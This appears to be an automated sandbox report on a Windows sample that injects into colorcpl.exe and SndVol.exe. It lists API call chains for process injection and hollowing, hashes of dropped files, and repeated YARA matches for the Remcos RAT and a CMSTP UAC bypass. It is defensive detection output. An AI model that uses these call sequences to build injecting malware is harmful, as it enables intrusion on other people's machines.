Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028BC368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, | 0_2_028BC368
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028BA1C0 GetModuleHandleW,GetProcAddress,NtOpenProcess,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,NtWriteVirtualMemory,GetModuleHandleW,GetProcAddress,NtCreateThreadEx,CloseHandle, | 0_2_028BA1C0
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028BC4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, | 0_2_028BC4DC
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028B7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, | 0_2_028B7AC0
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028B7968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, | 0_2_028B7968
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028BC3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, | 0_2_028BC3F6
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028B79FC GetModuleHandleW,GetProcAddress,NtProtectVirtualMemory, | 0_2_028B79FC
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028B7966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, | 0_2_028B7966
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028B7F48 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread, | 0_2_028B7F48
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028B7F46 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread, | 0_2_028B7F46
Source: C:\Users\Public\Libraries\Ocihlomc.PIF | Code function: 7_2_02AFA1C0 NtOpenProcess,NtWriteVirtualMemory,NtCreateThreadEx, | 7_2_02AFA1C0
Source: C:\Users\Public\Libraries\Ocihlomc.PIF | Code function: 7_2_02AFC4DC NtOpenFile,NtReadFile, | 7_2_02AFC4DC
Source: C:\Users\Public\Libraries\Ocihlomc.PIF | Code function: 7_2_02AF7968 NtAllocateVirtualMemory, | 7_2_02AF7968
Source: C:\Users\Public\Libraries\Ocihlomc.PIF | Code function: 7_2_02AF79FC NtProtectVirtualMemory, | 7_2_02AF79FC
Source: C:\Users\Public\Libraries\Ocihlomc.PIF | Code function: 7_2_02AF7966 NtAllocateVirtualMemory, | 7_2_02AF7966
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028BCA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle, | 0_2_028BCA6C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_046767B4 ExitWindowsEx,LoadLibraryA,GetProcAddress, | 5_2_046767B4
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_1C6467B4 ExitWindowsEx,LoadLibraryA,GetProcAddress, | 8_2_1C6467B4
Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\Ocihlomc.PIF 8A005601E52341E8AFF3C95CF30F4EDE6B874D2B7E6FFDB9AFDA9425733FC5D7
Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\netutils.dll A692D4305B95E57E2CFC871D53A41A5BFC9E306CB1A86CA1159DB4F469598714
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: String function: 028A6658 appears 32 times
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: String function: 028B7BE8 appears 45 times
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: String function: 028A4698 appears 247 times
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: String function: 028A4824 appears 882 times
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: String function: 028A44A0 appears 67 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 04694770 appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 04694E10 appears 54 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 04661E65 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 0671547C appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 066E2B71 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 06715B1C appears 54 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 04662093 appears 50 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 1C631E65 appears 34 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 1C664770 appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 1C664E10 appears 54 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 04832B71 appears 34 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 04865B1C appears 54 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 0486547C appears 41 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 1C632093 appears 50 times
Source: C:\Users\Public\Libraries\Ocihlomc.PIF | Code function: String function: 02AE6658 appears 32 times
Source: C:\Users\Public\Libraries\Ocihlomc.PIF | Code function: String function: 02AE4698 appears 156 times
Source: C:\Users\Public\Libraries\Ocihlomc.PIF | Code function: String function: 02AE4824 appears 628 times
Source: netutils.dll.0.dr | Static PE information: Number of sections : 19 > 10
Source: XY2I8rWLkM.exe | Binary or memory string: OriginalFilename vs XY2I8rWLkM.exe
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs XY2I8rWLkM.exe
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs XY2I8rWLkM.exe
Source: XY2I8rWLkM.exe, 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs XY2I8rWLkM.exe
Source: XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs XY2I8rWLkM.exe
Source: XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs XY2I8rWLkM.exe
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs XY2I8rWLkM.exe
Source: XY2I8rWLkM.exe, 00000000.00000002.2037895391.0000000014C50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs XY2I8rWLkM.exe
Source: XY2I8rWLkM.exe, 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs XY2I8rWLkM.exe
Source: XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs XY2I8rWLkM.exe
Source: XY2I8rWLkM.exe, 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs XY2I8rWLkM.exe
Source: XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs XY2I8rWLkM.exe
Source: XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs XY2I8rWLkM.exe
Source: XY2I8rWLkM.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
